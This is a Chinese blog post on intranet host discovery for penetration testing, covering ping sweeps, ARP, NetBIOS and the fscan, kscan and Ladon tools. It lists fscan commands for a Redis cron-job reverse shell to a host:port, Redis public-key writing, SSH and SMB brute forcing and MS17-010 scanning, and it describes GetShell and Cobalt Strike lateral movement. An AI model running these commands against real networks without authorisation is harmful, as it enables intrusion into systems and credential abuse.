内网IP扫描技术

于 2024-05-08 23:16:34 发布
阅读量1k 收藏 11
点赞数 12
分类专栏: 内网篇 文章标签: 网络 网络协议 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y22Lee/article/details/138588639
版权

一.ICMP协议扫描

1.介绍

ICMP是(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议族的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用!

我们日常使用的ping命令的就是利用ICMP协议发送请求回显数据到目标主机!

2.使用ping命令+cmd语法进行C端扫描

 for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr “TTL=“
 使用for循环进行循环ping,利用findstr进行匹配

优点是不会产生大量告警,比较安全!

在这里插入图片描述

3. fping工具

使用fping是一个小型命令行工具,用于向网络主机发送ICMP 回应请求,类似于ping,但在ping多个主机时性能要高得多。 fping完全不同于ping,一位可以指定IP数量和网段;

常用方法:

fping ip1 ip2 -c 10
扫描多个IP10次
fping -a -g 192.168.41.0/24
扫描C段IP

二.ARP协议扫描

1.介绍

ARP协议介绍地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议;

2.使用ARP命令查看ARP缓存信息

命令: Arp -a

在这里插入图片描述

3.使用ARP的工具进行探测

 Apr.exe ......

三.NETBIOS协议扫描

1.介绍

NetBIOS协议是由IBM公司开发,主要用于数十台计算机的小型局域网。NetBIOS协议是一种在局域网上的程序可以使用的应用程序编程接口(API),为程序提供了请求低级服务的统一的命令集,作用是为了给局域网提供网络以及其他特殊功能,几乎所有的局域网都是在NetBIOS协议的基础上工作的,在网络中使用计算机名通讯就是使用NetBIOS协议, NetBIOS协议,主要用于局域网通信,开启之后,局域网的其他计算机可以发现并找到你的计算机;

与前俩种协议对比,NTEBIOS协议不仅可以扫描出IP,还可以将IP对应的主机名一起扫描出来!

2.使用工具扫描

命令: nbtscan.exe + ip

在这里插入图片描述

四.FSCAN工具扫描

一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。 支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。

项目地址:https://github.com/shadow1ng/fscan

Fsan的用法非常多,可以参考文档介绍,这里只列举几个比较常用的命令

1. fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
2. fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
3. fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
4. fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
5. fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
6. fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名密码来进行爆破)
7. fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
8. fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
9. fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
10. fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
11. fscan.exe -hf ip.txt (以文件导入)
12. fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
13. fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量

五. kscan工具扫描

kscan是一款资产测绘工具,可针对指定资产进行端口扫描以及TCP指纹识别和Banner抓取,在
不发送更多的数据包的情况下尽可能的获取端口更多信息。并能够针对扫描结果进行自动化暴
力破解,且是go平台首款开源的RDP暴力破解工具;

项目地址: https://github.com/lcvvvv/kscan

六.Ladon工具扫描

Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。7.5版本内置100个功能模块,外部模块18个,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列等,密码爆破13种含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(wmiexe/psexec/atexec/sshexec/jspshell),Web指纹识别模块可识别75种(Web应用、中间件、脚本类型、页面类型)等,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动!

Y22Lee
关注
  • 12
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
内网ip扫描软件
04-26
内网ip扫描软件,可以快速的扫描内网ip端口,非常方便
C#winform 局域网IP和端口扫描
04-17
基于VS开发环境,C#编程语言;局域网tcp/udp 扫描IP和端口;
如何快速而准确地进行 IP 和端口信息扫描:渗透测试必备技能
weixin_43263566的博客
02-09 6496
渗透测试一|P端口信息收集
IP 扫描程序:轻松发现、扫描和跟踪 IP 空间
ITmoster的博客
07-03 1896
IP 扫描是实时持续监控网络 IP 地址空间的过程。包括 ICMP ping 扫描和 SNMP 扫描在内的网络协议数量用于扫描网络中的 IP 地址。网络管理员依靠 IP 扫描程序轻松检查和管理 IP 地址空间。使用网络 IP 扫描程序进行 IP 扫描可查看 IP 地址空间利用率和性能。
IP地址扫描程序/扫描工具
ITmoster的博客
01-31 5246
随着许多组织采用自带设备 (BYOD) 等策略,IT 网络变得越来越复杂。随着越来越多的设备连接到网络IP 地址扫描势在必行,以确保设备在连接到网络时不会遇到问题。IP 地址扫描器是 OpUtils 中的一个模块,是一个全面的 IP 地址管理和交换机端口映射解决方案,可帮助 IT 网络管理员在几秒钟内扫描复杂网络基础设施的 IP地址空间。OpUtils的IP地址扫描器使IT网络管理员能够实时了解IP地址状态,可用性,保留IPIP使用情况,检测IP地址冲突,并通过其IP地址跟踪功能持续跟踪它们。
cmd扫描局域网ip 如何扫描局域网中的路由器的IP地址
Moke
12-25 1万+
【该命令的作用,是用本机IP地址ping 10.31.42.1 到 10.31.42.254 ,这里的10.31.42.0和本机IP相关】。如果是DHCP动态获取IP,一般的情况是,DHCP服务器先给你分配一个临时的IP地址, 如果要上网,则跳转到认证界面,认证通过后再分配一个新的IP地址给你, 这样就可以连到内网了。注:这种方法只能获取到本IPIP,如果局域网有其他网段的IP,将无法获取到。如果是静态IP,不知道内网IP配置情况,只能逐个地址段试了。电脑IP地址分两种,静态IP地址和DHCP动态IP
网络内网IP扫描 IPScan.exe
03-14
网络内网IP扫描 网络内网IP扫描 网络内网IP扫描 网络内网IP扫描 网络内网IP扫描 网络内网IP扫描 网络内网IP扫描 网络内网IP扫描
内网IP扫描工具txt版 扫描完成可以输出txt文档
01-24
内网IP扫描工具txt版 扫描完成可以输出txt文档
局域网内网设备扫描IP扫描软件
04-08
局域网内网设备扫描IP扫描软件,可追踪外网,ping
局域网内网IP扫描
12-14
内网IP扫描内网IP扫描内网IP扫描
局域网IP扫描工具-OpUtils
ITmoster的博客
10-10 1万+
网络IP扫描已经成为网络管理员的日常活动。扫描、监控和管理网络IP地址空间是非常繁忙的。管理大IP范围的网络管理员和操作员需要一个易于使用的工具来进行高级IP扫描和监控。OpUtils是一流的网络扫描工具,可以高效执行这项任务。
几种查询局域网内在线弱电设备IP地址的方法
qq_43416206的博客
05-23 1215
可以在网上下载局域网IP扫描工具,电脑安装后即可查询扫描,我知道的一款扫描工具NetBScanner,它是一款适用于局域网中搜索各个主机ip地址的搜索分析软件,NetBScanner采用了NetBIOS协议,可以扫描指定的ip段内的主机,查看对应主机的详细信息,如:计算机名、IP域名,MAC、网卡属性等,并且可以将信息进行导出,非常方便。使用ping等工具扫描局域网网段,是主动获取信息的方式,需要终端对ping命令回复,有些终端可能由于安全问题,关闭了ping的响应,那么获取的信息可能与实际情况有误。
几种查询局域网内在线弱电设备IP地址的方法,总有一款你用的到
君逍遥o
09-04 7743
判断某个网段的在线监控设备IP,最简单的方式就是登陆网关交换机查看,是被动获取信息的方式,获取的数据比较准确; 使用ping等工具扫描局域网网段,是主动获取信息的方式,需要终端对ping命令回复,有些终端可能由于安全问题,关闭了ping的响应,那么获取的信息可能与实际情况有误。
IP扫描工具(简易)
weilai1546的博客
09-19 228
部分电脑配置太差需要适当调节回收模块中的时间,需要中文,虚拟机网络建议关闭以避免不必要的扫描,如果需要修改扫描其他网络IP,只需要更改前面的192.168部分即可,主程序的思路是生成多个小程序同时ping,并收集处理ping后的结果。所以性能吃满是正常现象,如果电脑太差导致回收模块提前工作,就会导致产生大量子文件还没来得及删除,删掉并延长时间即可。至于编写,只需要把上述代码复制到.txt文本后并修改后缀成.bat即可。
探索MMLanScan:一款强大的局域网扫描工具
最新发布
gitblog_00037的博客
04-18 449
探索MMLanScan:一款强大的局域网扫描工具 项目地址:https://gitcode.com/mavris/MMLanScan MMLanScan是一个开源的、跨平台的局域网扫描工具,由开发者Mavris精心打造。该项目旨在帮助网络管理员和普通用户快速发现并了解局域网内的设备信息,提供了一种简单而有效的方式来探索和管理你的网络环境。 技术架构与分析 MMLanScan基于Java语言开发,这...
常用IP扫描工具整理一下
热门推荐
nihao_ma_的博客
09-05 3万+
1. Nmap nmap被称为‘’年度安全软件”。 它是免费开源用于网络发现和安全审计的工具。 灵活的 : 支持数十种先进技术绘制出充满IP过滤器、防火墙、路由器和其他障碍的网络。这包括许多端口扫描机制(TCP和UDP)、操作系统检测、版本检测、ping扫描等 强大的 :可以毫不夸张地扫描数十万台机器组成的网络。 跨平台的:大多数操作系统都支持。包括:Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, Net
网络】如何扫描局域网内所有设备的ip和mac地址
bandaoyu的note
07-26 2万+
原文:https://www.jianshu.com/p/b2e68a5b88f2 cmd 输入: for /L %i IN (1,1,254) DO ping -w 2 -n 1 192.168.0.%i #上面的命令表示搜索192.168.0.1 到192.168.0.254 或: arp -a
局域网在线设备扫描工具V2.0软件说明
星如雨落
10-26 1万+
软件简介: 一个场所的监控摄像头一般都处在同一个局域网内,当在调试和维护监控设备时,如果不知道监控摄像头的IP 地址,可以使用本工具扫描局域网内监控设备IP 地址和MAC 地址,方便简单。还可以将扫描结果导出到excel文件。 优酷视频演示: https://v.youku.com/v_show/id_XNTgxNTUwNzcwOA==.html 软件工具主界面: 软件下载衔接: 1.百度网盘链接:https://pan.baidu.com/s/1-ogPtA1ISu58g–oDh9q8g 提取码:bq
内网ip扫描工具 csdn
07-25
### 回答1: 内网IP扫描工具是一种用于扫描并识别内部网络中各个设备的工具。通常情况下,内网中的设备会被分配一个内部IP地址,以便在同一网络中进行通信。 CSDN(CSDN Internal IP Scanner)是一款功能强大的内网IP扫描工具,主要用于网络管理员或渗透测试人员进行内部网络安全评估和漏洞扫描。CSDN具有以下特点和功能: 1. 网段扫描:CSDN能够通过设置起始和结束的IP地址,扫描指定网络范围内的全部设备。管理员可以自定义扫描IP范围,包括局域网中的所有主机。 2. 设备识别:CSDN能够探测并识别网络中的各类设备,如计算机、服务器、打印机、路由器等。它能够提供设备的基本信息,如IP地址、MAC地址、设备类型等,以便网络管理员了解网络拓扑结构。 3. 漏洞扫描:CSDN集成了多种漏洞扫描模块,能够自动检测和识别网络中存在的漏洞。它会对设备进行全面的扫描,包括开放端口、漏洞程序、弱口令等,以便管理员及时发现和修复潜在的安全威胁。 4. 安全提醒:CSDN提供实时的报告和告警机制,及时向管理员提供网络中发现的漏洞和安全隐患。管理员可以通过邮件、短信等方式接收到相关的警报,以便及时采取措施避免被攻击。 总而言之,CSDN是一款功能强大的内网IP扫描工具,能够帮助网络管理员或渗透测试人员全面了解内部网络安全情况,并及时发现和修复潜在的漏洞和威胁。 ### 回答2: 内网IP扫描工具是一种用于扫描和识别内网中的设备的软件工具。它通过发送探测包到指定IP地址范围内的主机,并分析主机的响应来确定目标主机是否可用、开放的端口及其对应的服务等信息。 内网IP扫描工具通常被用于网络管理、安全审计等场景中。它能够帮助管理员发现内网中的未经授权的设备,识别潜在的安全风险,及时采取措施加强网络安全。同时,它也可以用于设备管理,帮助管理员跟踪控制内网设备的信息和状态。 常见的内网IP扫描工具有Nmap、Angry IP Scanner、OpenVAS等。这些工具通常提供了丰富的功能和高度可定制化的选项,使得管理员能够根据自身需求进行扫描操作。比如可以选择扫描目标的IP地址范围,指定探测包的类型和参数,设置扫描的时间间隔等。 然而,需要注意的是,内网IP扫描工具在使用时需遵循法律法规和道德规范,不能违反他人的隐私权和网络安全。因此,在使用这些工具时必须取得合法的授权,并且严格遵守相关的规定和约束。此外,随着网络安全形势的不断变化,内网IP扫描工具的功能和性能也不断更新和改进,因此,使用者需要持续关注新版本和安全补丁,以保持工具的有效性和安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值